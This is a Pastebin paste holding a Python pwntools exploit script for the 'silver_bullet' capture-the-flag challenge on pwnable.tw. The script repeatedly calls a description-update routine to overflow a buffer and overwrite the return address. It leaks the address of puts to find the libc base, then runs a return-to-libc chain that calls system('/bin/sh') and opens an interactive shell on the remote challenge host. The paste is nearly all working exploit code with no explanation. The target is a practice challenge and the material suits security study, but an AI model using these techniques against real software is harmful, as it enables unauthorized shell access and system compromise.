Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- from pwn import *
- env = {
- "LD_PRELOAD": "./libc_32.so.6"
- }
- glibc=ELF("./libc_32.so.6")
- print glibc.symbols['system']
- context(os='linux', arch='i386', log_level='debug')
- GDB = 1
- base=0
- if len(sys.argv) >1:
- r = remote("chall.pwnable.tw", 10103)
- else:
- r = process("./silver_bullet",aslr=False)
- if (GDB):
- gdb.attach(r,gdbscript='''
- b* 0x08048A18
- c
- ''')
- def create(des):
- r.sendline("1")
- r.recvuntil("Give me your description of bullet :")
- r.send(des)
- r.recvuntil("Good luck !!")
- def powerup(des):
- r.sendline("2")
- r.recvuntil("Give me your another description of bullet :")
- r.send(des)
- r.recvuntil("Enjoy it !")
- def beat():
- r.sendline("3")
- def main():
- create(cyclic(47))
- powerup(cyclic(1))
- pos=7
- payload="A"*7
- payload+=p32(0x080484A8)
- payload+=p32(0x080484F0)
- payload+=p32(0x0804AFDC)
- powerup(payload)
- beat()
- beat()
- r.recvuntil("Oh ! You win !!\n")
- puts=u32(r.recv(4))
- base=puts-glibc.symbols['puts']
- glibc.address=base
- log.success("BASE: "+hex(glibc.address))
- log.success("SYSTEM: "+hex(glibc.symbols["system"]))
- log.success("\\bin\\sh: "+hex(next(glibc.search('/bin/sh\x00'))))
- create(cyclic(47))
- powerup(cyclic(1))
- pos=7
- payload="A"*7
- payload+=p32(glibc.symbols["system"])
- payload+=p32(0x080484F0)
- payload+=p32(next(glibc.search('/bin/sh\x00')))
- powerup(payload)
- beat()
- beat()
- r.interactive()
- if __name__ == "__main__":
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement